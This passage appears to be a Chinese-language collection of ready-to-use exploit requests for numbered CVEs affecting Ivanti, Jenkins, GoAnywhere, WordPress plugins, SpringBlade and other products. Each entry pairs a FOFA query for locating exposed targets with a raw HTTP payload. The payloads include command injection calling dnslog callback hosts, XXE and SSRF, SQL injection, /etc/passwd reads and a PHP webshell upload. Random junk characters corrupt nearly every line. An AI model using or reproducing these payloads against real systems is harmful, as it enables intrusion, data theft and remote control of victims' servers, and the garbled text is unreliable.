" b) b' `" G2 P- Y$ H3 WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. p& n) f# X8 G* n2 Q; R/ [7 ?5 s
Content-Type: application/x-www-form-urlencoded; charset=UTF-8: G( c& j( U: R, V
X-Requested-With: XMLHttpRequest
2 \/ _- U- o, c- Z; E6 ]; H0 a# t& c) U! d6 f$ Q8 R* k/ Q6 h
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
/ J# d8 M# u5 y( A( ~# d
1 ^/ } M6 |, C$ f) l. V
& d- s0 ]) L! ]8 P$ c4 \99. Ncast盈可视高清智能录播系统busiFacade RCE
+ m. d+ B- }- O% P' P: Z9 cCVE-2024-03058 [" U) j* |- M5 } R% }4 ^
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
& [8 v7 F# \3 k+ f- ?+ oPOST /classes/common/busiFacade.php HTTP/1.17 X& C( g! Y8 C( o" B2 i
Host: 192.168.40.130:8080
7 s; j$ ], W) s- NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
/ \+ P7 ]2 k( ^$ d, p, C$ cConnection: close* u b2 Z/ q4 [5 a# p) Z
Content-Length: 154; m: p! V' d9 g
Accept: */*5 N: D( d# P6 i4 ~# }
Accept-Encoding: gzip, deflate
3 p" _! S3 i M! eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! W2 N5 T2 `. I8 {1 x% V
Content-Type: application/x-www-form-urlencoded; charset=UTF-8& l2 |8 b; t7 Y' H: `. F' A
X-Requested-With: XMLHttpRequest( g# y: k- h; S5 n* T- b% C
s( a* Z1 F8 ]
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D8 X5 G& H3 t6 Y. u* x8 F/ l( m
7 y! g. D. V# _7 W! L$ N2 }' `, s7 d1 c) `' V2 \
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
# q" m* ?1 a& O" k4 ^CVE-2024-03521 o$ ^& m J" s4 j4 z$ `/ t: {
FOFA:icon_hash="874152924"9 K& F+ T6 D2 n5 l$ i
POST /api/file/formimage HTTP/1.1 R7 _( T6 E4 w" {, D. r7 f
Host: 192.168.40.130
! A1 p; p) l# O8 c# v, JUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36+ w- b3 h& T" D* Y
Connection: close, c: W% B' _7 q$ f9 r6 P9 J) c
Content-Length: 201
# A. ]3 S7 B% `: p3 uContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
# E6 r2 J6 _& G9 f& {0 hAccept-Encoding: gzip
2 E9 M- W& H' ?8 y0 ~2 }& }$ D7 V$ ^
------WebKitFormBoundarygcflwtei' F. E( |7 L/ s
Content-Disposition: form-data; name="file";filename="IE4MGP.php"& b! E, U) f% n2 \# C" V6 m
Content-Type: application/x-php. _; ` v0 M2 m* S. }6 k0 y
0 I: r P: N$ q! \0 Y
2ayyhRXiAsKXL8olvF5s4qqyI2O3 I# u; Y9 V0 [7 o# m( h, m; B; L
------WebKitFormBoundarygcflwtei--5 o9 N4 _+ `9 P2 |7 U
; n* y: i0 c9 z' ?: |; k( A- J2 r% c) ?5 X) w' P+ R
101. ivanti policy secure-22.6命令注入
3 _* x6 T* v% [4 zCVE-2024-21887
" H; ~* V3 U- ^: L: L" `6 B( ?FOFA:body="welcome.cgi?p=logo"
2 L& l/ ^6 Q, B3 g/ c2 Z0 w) bGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1' v; L; `7 p, {
Host: x.x.x.xx.x.x.x8 h7 ~* I3 x4 ^) d( B) y. S
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
. x0 i8 x; H0 t/ h+ Q4 |7 ?- bConnection: close
; f: }* N. t0 L- g$ U, D+ RAccept-Encoding: gzip
, ~5 V0 @. V; l! d: S% u/ b
/ N a( x* X2 J/ K8 C2 m
1 K+ x8 o& A4 U! ~102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行* C5 U8 v5 v1 G5 A* q9 V7 b2 {% A0 R
CVE-2024-218936 P6 Z \2 k- b \5 r- A$ z y
FOFA:body="welcome.cgi?p=logo"
9 H0 F2 Q$ o' y5 _+ dPOST /dana-ws/saml20.ws HTTP/1.13 P# z# M' a, Y2 }
Host: x.x.x.x
$ U1 T& ?9 w8 U, ? Y3 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.366 X5 @: T; }3 Y# E9 J- ]' x; J
Connection: close
4 Z8 l9 X8 b# O9 n+ E9 OContent-Length: 792) x6 j% u/ V0 V8 B, @
Accept-Encoding: gzip7 K2 N t( }9 Q% b) [% I
" Q: ~: N- I: }2 m) b( |5 A<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>0 q5 ^. T5 e6 M/ P
8 z' p+ W! V# F% q1 Q. r1 d" l
103. Ivanti Pulse Connect Secure VPN XXE# K0 f! b9 i* p
CVE-2024-22024, }4 I6 H$ U4 q e, e
FOFA:body="welcome.cgi?p=logo" p9 O& b! e' x0 s2 B6 S- ?
POST /dana-na/auth/saml-sso.cgi HTTP/1.1! m1 {) o' M2 e8 o0 c$ ^6 L3 w4 P* {4 E
Host: 192.168.40.130:111% Z$ Q; k* O3 w9 W# N, @% R
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
/ I) _6 ]0 h. ^, ^( RConnection: close, s( P8 k+ h' p' K3 x8 @8 j
Content-Length: 204
; B- T" X; Q( iContent-Type: application/x-www-form-urlencoded
5 J- S0 `( |1 i- E- V/ g |# qAccept-Encoding: gzip
3 G. C6 u6 _% U; F6 [# W! Z7 ~! H
- y" S. [, J5 M6 oSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
1 N4 b5 [; G* G! z0 n3 H! h$ q% I: u, F! N$ q# q
$ ?; X& I* G, M其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
/ c0 q x+ W& [1 Y2 G: _6 H; ^<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>5 P, M& I2 p: {0 y, W& M, G
- ^. S/ o. A, o6 r' s; x7 o4 i5 l" I+ T0 C* I; c4 n+ B; B; Y% g- }
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
7 f# _& o$ h0 e6 [CVE-2024-0569
1 W+ Y1 T/ A0 h, T4 k5 p7 w( YFOFA:title="TOTOLINK"7 n* A; J: N" ~7 z. i
POST /cgi-bin/cstecgi.cgi HTTP/1.1! X& `- n T! I5 X9 O4 m, f6 h: m% R
Host:192.168.0.1. C/ m# ?& f e) f
Content-Length:419 k1 A1 V* D: _* p0 x, M9 S
Accept:application/json,text/javascript,*/*;q=0.01
& E3 M1 i2 c, B7 n% fX-Requested-with: XMLHttpRequest
4 t0 S9 e0 v6 GUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
" P+ R/ q; t2 u; gContent-Type: application/x-www-form-urlencoded:charset=UTF-88 a4 y$ N+ H& P8 x- r* T9 y+ L' x3 m$ x
Origin: http://192.168.0.1
5 U6 k, _- l0 C4 ~Referer: http://192.168.0.1/advance/index.html?time=1671152380564
$ Q- t! B8 Y+ Q" E' E7 LAccept-Encoding:gzip,deflate
+ E$ p0 i4 q1 [Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.76 E; g& F: t! K+ c
Connection:close
- C- `' x& L7 G6 y: _; w
) C% M0 F8 t- b0 L( ~# u{7 P* X2 E3 E" ^# Z. R) s+ j. l/ A
"topicurl":"getSysStatusCfg",; Z2 z8 T1 f" m1 a4 C
"token":""
" K( v2 O/ g: Q! k}; w/ ? q- b0 n; P
; k. C, ^5 P- |5 T; z0 s105. SpringBlade v3.2.0 export-user SQL 注入- K. P$ S: k! @6 W! v; E
FOFA:body="https://bladex.vip": a* W5 Z6 | `, T
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
. ]3 j% w# e/ H* P* O5 _9 k# p
# z( O. C0 ^$ f106. SpringBlade dict-biz/list SQL 注入
8 D7 X8 e% A) ?& n" jFOFA:body="Saber 将不能正常工作"
! v, M, P4 L& {$ x4 eGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
8 R y* J! M% H3 S! E$ M3 v9 [2 THost: your-ip4 | y0 P0 N0 n" \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 c9 w9 A/ ^- C1 p2 ~7 n8 q& FBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A' K6 D: j) r: q( @, @+ t
Accept-Encoding: gzip, deflate
' S d2 [: p! A1 \: R6 Z4 _0 PAccept-Language: zh-CN,zh;q=0.9
8 w0 Z, w# S1 v. c! FConnection: close
: m; |9 ?% I6 o# G* h N& L3 h/ f- G7 Q4 a+ p2 {5 M
0 d9 a4 G& w% c: @; m
107. SpringBlade tenant/list SQL 注入
W+ o* B2 a5 `& RFOFA:body="https://bladex.vip"9 W" C5 s/ j, e: v" t
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1; H. l* ]) t* R. N! V) J
Host: your-ip
6 {5 Y% ?! d- \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
# G% B9 x5 P. w4 |% j; |/ MBlade-Auth:替换为自己的! x+ K9 P I- e4 U/ G% s
Connection: close+ {" E0 \6 d- d4 @( E
2 E9 L% B7 o5 E1 O5 D0 r L" P8 p( i& ` V& r% j: J5 {
108. D-Tale 3.9.0 SSRF
+ b, S3 `* g, c( y2 }CVE-2024-21642) F( S* h& J: k+ Z) P' b
FOFA:"dtale/static/images/favicon.png"
" A- y/ t* P8 x5 t: D, J ]7 O6 a1 |GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
! w/ ^. @1 i7 v: ^# c4 _5 LHost: your-ip5 Z0 f$ E5 s% X3 N2 C
Accept: application/json, text/plain, */*, a; B# F8 u1 C5 @2 T8 o4 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.363 d: U6 Y1 f$ G
Accept-Encoding: gzip, deflate
3 W4 j `; o3 }3 WAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
4 B6 n; M% `) RConnection: close" x3 e2 N0 z# f3 i: Y1 P Y0 A- w
' a* ?- u! E- `2 L$ N* z, n) q% M: d1 E! q* f, E1 \
109. Jenkins CLI 任意文件读取) N9 c! y7 ~) n1 H4 n
CVE-2024-23897# E0 o% ^+ a1 E; E5 L6 m
FOFA:header="X-Jenkins": M5 P. ^9 T" _6 s4 W
POST /cli?remoting=false HTTP/1.1
, }. E4 p. K+ L) g, G. }/ dHost:/ i+ }7 Y% \# F# b# o- j
Content-type: application/octet-stream' g* \2 u" `+ m/ B. h
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92' B: |/ C4 e* d6 \$ C' w' F" p
Side: upload
: U; L+ j/ T! V, D7 ?Connection: keep-alive V) t; h7 s6 t8 `" U
Content-Length: 163' D3 w( @4 ?6 d: G- A% g, Y" I
' Z, Q5 u5 e" I. T7 S1 t: ]* T
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'0 ~' F7 x4 d B$ Z+ A& a
5 i- N# q+ M% A
! V5 z- p" g2 FPOST /cli?remoting=false HTTP/1.1) W8 n l1 X8 `9 m$ V! U
Host:- Z& J# `" C: g9 M' x6 f9 T
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e920 M' K% c3 ^1 [/ C# z( c
download9 [7 Y6 Y! @( m- r% M! x; {2 W
Content-Type: application/x-www-form-urlencoded. _0 j/ ?+ e H9 I" r9 ~
Content-Length: 0
5 h, t0 p4 W: b5 l. R: B4 @/ u/ P6 p _- u5 L
& [. K6 i4 H$ W, c3 Y- T
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin0 b6 T% B* r. n9 R, f
java -jar jenkins-cli.jar help
+ Z8 r W( O8 G( S5 g[COMMAND]% @: Z- v- Y( _; h
Lists all the available commands or a detailed description of single command./ j) U# A5 r+ C7 k: J/ {
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)2 |0 B8 b9 W* K* e* G
( B! R. y: |% V$ `! ~: W" N8 }
8 p; R* l7 w7 [- \& ~9 D" R7 s4 Y/ |* O110. Goanywhere MFT 未授权创建管理员
2 x9 w& \; h- K0 E2 F: vCVE-2024-0204
/ P: Q0 V, h0 c7 b' @" ]& T9 Y e$ D5 ^FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
+ n3 p* x2 d$ p) b; Q0 zGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
1 \ Y: g& S# h0 b2 c5 rHost: 192.168.40.130:8000
0 a# p$ L5 Z- k7 g8 _/ f9 H4 g6 SUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36: i* y Z! X. [% {% Y
Connection: close
: U! _7 T/ t5 T$ CAccept: */*
& T S, I* z& G% f3 _* n, z& dAccept-Language: en
+ {: ^+ D/ Q+ C% mAccept-Encoding: gzip* a2 W5 ^0 F; v. ^/ m Z' x5 G: I/ d
* ?+ _$ G( C P) K
7 b9 h" q9 i3 u: ]( Z+ y2 O( W111. WordPress Plugin HTML5 Video Player SQL注入
, p: J- Z" E9 y1 n9 A# SCVE-2024-1061: j. W" e3 v3 b' M4 ]- X% R
FOFA:"wordpress" && body="html5-video-player"7 p1 X0 A4 k% i/ P# E
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.17 \, m! L. B) X Q+ m3 x
Host: 192.168.40.130:112
y& v- |( T! T3 ^; |, W" X7 {0 B) B1 vUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
5 t8 L3 _ q3 K) Z! TConnection: close
" T: ^9 d- h2 i# T1 eAccept: */* K6 ^4 K: |- u
Accept-Language: en3 l+ d- K5 o$ X4 R. y' {7 X
Accept-Encoding: gzip& q5 J0 f. d7 r* O" J
. `. A' \/ S5 P; |8 C
3 m" I% u7 H6 B/ e9 [112. WordPress Plugin NotificationX SQL 注入
) J- D- n" n+ ^, M0 U: ICVE-2024-1698+ k. v8 V/ L; Q, @- ?1 ~' q% p
FOFA:body="/wp-content/plugins/notificationx"
9 a3 C0 h- q4 M8 f/ R7 G, tPOST /wp-json/notificationx/v1/analytics HTTP/1.1$ z" z6 m3 n1 r+ G
Host: {{Hostname}}3 O4 D8 q3 ^& m8 r
Content-Type: application/json- i" o1 S' S0 M! B6 D1 ~
) A" K3 v( M8 f! i( j+ s3 \
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
% S9 o h* Z @4 t0 \0 w# y2 q$ \4 j" W& ` \' M
% H& |, j9 r- Y# o6 @$ H; a
113. WordPress Automatic 插件任意文件下载和SSRF' D/ L6 Q6 t: [1 r, E, n
CVE-2024-27954" i$ u* e7 d2 K
FOFA:"/wp-content/plugins/wp-automatic"
; q$ u: b% p& ?* f/ XGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1/ l: d1 \; c1 d8 b
Host: x.x.x.x
; A, [; ?; B% X6 o2 ?- F0 {User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36$ B a) b/ V+ E2 `
Connection: close
6 ^5 b7 v. t: B9 Z# [6 y1 }5 CAccept: */*
+ V r% N6 } A: w, RAccept-Language: en
: b9 t8 M# ]9 X$ G" J3 {- B9 pAccept-Encoding: gzip
9 }( p) ]# }& p
% O. ~( V+ @$ [/ N4 T7 ~) U5 I& e6 b' P$ P
114. WordPress MasterStudy LMS插件 SQL注入
# b# z) C8 Y# a2 \; Z! C8 b' IFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
7 v+ E% b2 }( dGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.11 @% Y! s2 ]1 ]; z
Host: your-ip
; W, i6 J% _1 w0 H* uUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
+ p7 Q! C7 a* ~" nAccept-Charset: utf-8
0 X- b6 k- l9 y+ T+ `! EAccept-Encoding: gzip, deflate
" p/ R$ ` n ZConnection: close4 B4 v, q% \" a" ^; q5 v
; M: f& b/ i* Y6 V; K8 w8 I6 D3 Q+ [- [% e7 u9 k |
115. WordPress Bricks Builder <= 1.9.6 RCE- \ q0 c. G# n& l
CVE-2024-25600' l5 I+ y9 S3 f% ~! J+ a! [ t
FOFA: body="/wp-content/themes/bricks/"
. Z3 k4 w. @9 @4 M第一步,获取网站的nonce值: {; j! \/ e+ w2 Y' Q
GET / HTTP/1.1
4 f) Q7 d% E! g& F. NHost: x.x.x.x
( `% i* I1 ~) R9 [User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 z- O. B, o" {0 |5 @4 ]! z* V
Connection: close
8 y. F+ V# `0 t6 SAccept-Encoding: gzip# R6 K, Z1 q5 ?* K$ C2 @; \( ]" w
2 U- z0 `4 g, |& @. r& L( }+ m( v1 [
5 U6 b9 }$ f7 G' S
第二步替换nonce值,执行命令, g2 Z3 p/ x! c7 v
POST /wp-json/bricks/v1/render_element HTTP/1.1
* g0 C# t. J& d& B4 K+ IHost: x.x.x.x x Y9 {1 m6 S$ q: D: T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
; [7 l- Y+ m" M4 O! c5 j, |$ aConnection: close1 v# n. H8 Y, A+ F( w: y. M
Content-Length: 356/ E, ^/ x6 ^) r* @0 E2 P$ `
Content-Type: application/json V9 m( H1 t5 H8 W, |) @4 k
Accept-Encoding: gzip
" v. I8 b+ i" T/ A5 L. ]& c+ | q8 ^
{
% q: X0 J# g' T2 o5 W" m"postId": "1"," }; I! \0 p- W+ f! u
"nonce": "第一步获得的值",' [+ S* q1 L% A
"element": {" q, h) b. G/ {; }+ W; g
"name": "container",
5 [7 T1 f$ c: n) K. p' f7 { "settings": {/ j) C0 k7 a- `& V5 u5 y
"hasLoop": "true",% s0 @1 b' a1 G
"query": {
4 J. E9 K- T9 y" G% ~5 \ "useQueryEditor": true,, Z4 u4 A2 a6 I3 z3 O
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",4 f# X5 e" P& t
"objectType": "post"1 m- d# p( u, M
}
; `: L3 w1 b5 I& S, t3 O } y' f, M0 i t7 Q
}6 P) T8 W" M W; x
}
5 s/ G% C' w ^; o( `
! q; Z0 R4 b( Z& l* C
' R9 [0 _( z: M116. wordpress js-support-ticket文件上传
E3 t! G2 g6 g5 h! T; v% s0 n& VFOFA:body="wp-content/plugins/js-support-ticket"
2 \2 Y; l( H7 f7 tPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
+ z: r" q5 O; T. |' xHost:* u$ K% J5 P T7 {* k, L% [; n+ D
Content-Type: multipart/form-data; boundary=--------767099171 l7 @* v6 b R3 Q: ]
User-Agent: Mozilla/5.0
6 o# F+ [2 r/ v3 [/ S1 N; \1 |3 K% y& F9 {
----------767099171: X, T# U! H0 i! s. {
Content-Disposition: form-data; name="action"
, u/ B( ]2 N$ Bconfiguration_saveconfiguration8 `% q4 j. x* p) R, s- V- _
----------767099171) \* ^" e B- B x4 m
Content-Disposition: form-data; name="form_request"
- I/ X! D3 G7 g9 Jjssupportticket1 j4 g5 A5 Q. h+ l+ c, y
----------767099171
/ s2 z) |( X4 A% BContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"6 E$ l# y- l6 @- b9 m3 F+ D
Content-Type: image/png- K7 `$ D7 w" f X* Z
----------767099171--
0 L/ C. ?6 |) Z+ X
% u' _+ L3 I% Z: o7 O
& V' W* m7 D1 f117. WordPress LayerSlider插件SQL注入( y- V% `) T2 d/ ^ O4 {
version:7.9.11 – 7.10.0
9 @: k& O: s5 c6 G& SFOFA:body="/wp-content/plugins/LayerSlider/") y4 [7 Z9 R# y
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1. C" E8 v; m% g. e8 h$ N( b
Host: your-ip- ]7 |" p. A' E+ x: l& w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0* I4 b4 i& ]0 J9 s5 P" r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ ~2 u# B. l! H! RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# y& U0 K* A# V nAccept-Encoding: gzip, deflate, br2 L+ k' W& e: {
Connection: close
: `2 Q+ i/ x! Y' A2 DUpgrade-Insecure-Requests: 1
9 O7 {% n" c2 V4 I- F
$ k( N' G$ a; J, ?3 d3 o
( x! d8 J2 `) f; N118. 北京百绰智能S210管理平台uploadfile.php任意文件上传8 r; V: H- I9 W% O* i9 ^" M5 Q
CVE-2024-0939# m, C8 V0 S6 a8 y a' U- ]
FOFA:title="Smart管理平台"
; ]' a% `7 M! A" z+ t' p) sPOST /Tool/uploadfile.php? HTTP/1.1
- D- I7 @$ }& n. x1 J _- Q, ?Host: 192.168.40.130:84435 k* }( w% x5 d G7 k
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8: Y: v7 O2 {4 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0/ U6 d7 l9 M: I, i1 W" U! D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 a/ F. X0 o+ M$ p4 i( I. O7 wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 s1 ^# |! t6 y2 x! D
Accept-Encoding: gzip, deflate1 c1 l5 g0 t0 H7 K- h
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
5 j; d7 D* T7 xContent-Length: 405
, j( r i7 b/ Z& j* z" \Origin: https://192.168.40.130:84436 V R& `4 n4 ~/ L! }6 o8 i4 ^
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
9 ^# c* i$ s6 v, Q; o9 GUpgrade-Insecure-Requests: 1
- z. R. S+ h5 d2 s3 u7 F$ iSec-Fetch-Dest: document. Q q& h' g6 k) Q3 r; M0 q; a
Sec-Fetch-Mode: navigate1 u5 Q/ K$ w, D0 `% A
Sec-Fetch-Site: same-origin. r( S8 J: J) L2 B9 L
Sec-Fetch-User: ?1
$ M, F4 `$ I# e$ o/ i# wTe: trailers: v. X' `- `2 R: p# V8 N
Connection: close
+ v: I3 O- E) j* W- [& A( g- n7 Q6 C) E8 i" m- i
-----------------------------139797012227476466340371828873 T! l. c$ ]- ]# B
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
3 a5 T" G) h! b: Y, k. W8 c: z" SContent-Type: application/octet-stream' ?- j- `! o" G. L5 e9 z9 p8 D8 W
4 b, U, m+ c8 _# X$ z t8 O- D) T<?php- I ?+ e H, @9 f
system($_POST["passwd"]);" H% Y& m8 z: x" m( Y; |1 J
?>$ s7 y2 y" I% T+ K* s5 Y6 j. S
-----------------------------13979701222747646634037182887
6 r( N7 x- X/ q1 z P7 n% RContent-Disposition: form-data; name="txt_path"
6 ]% v. ? G% Q$ n7 f* `
# R" w, w0 U3 l/home/src.php9 }$ _$ i v8 p, N
-----------------------------13979701222747646634037182887--
% x/ ?9 w: |; E! [; _5 l
& y3 x3 d" W$ g5 d9 S% o" z: H" Q5 V s) c# c
访问/home/src.php
8 `' `5 g6 F- a0 f) r8 x% T5 g% Z
& ^3 E: p3 r6 A3 a& ~( R* b119. 北京百绰智能S20后台sysmanageajax.php sql注入/ t5 r, s* N% [: c, K8 z
CVE-2024-1254
, ?4 Q# v7 n8 iFOFA:title="Smart管理平台" X- \+ ]! x; r; N8 a6 z
先登录进入系统,默认账号密码为admin/admin
9 T7 @6 }1 n( X2 X3 APOST /sysmanage/sysmanageajax.php HTTP/1.11
9 j( w. n3 r( g/ w: ~* y5 _. M" `Host: x.x.x.x# T0 m# R2 Q* ]$ N, I
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee1 V3 T$ T& {( j4 c1 M, Y9 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
$ x' r# e6 T. y0 t7 U/ X7 HAccept: */*8 k! `) [2 x: r% `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: |. `- k0 P0 q/ }, e" LAccept-Encoding: gzip, deflate
5 U) S& u; c2 K2 e: i, SContent-Type: application/x-www-form-urlencoded;
# `/ x/ [7 b( b0 L# z+ TContent-Length: 1094 X4 W" ]/ F, h* b7 o0 ?* E+ E; ~. [
Origin: https://58.18.133.60:84434 X! ]& ?* t) G' c
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
! W5 Q9 l/ k* }1 ^3 GSec-Fetch-Dest: empty% G, P! D# t$ I* f' n& e- u5 p
Sec-Fetch-Mode: cors1 [1 ^1 p& m4 K1 s2 {! [. g; `
Sec-Fetch-Site: same-origin
, m( Z; z+ |! \5 g$ [% RX-Forwarded-For: 1.1.1.1
+ p, S5 Q( u/ T& D# R bX-Originating-Ip: 1.1.1.1
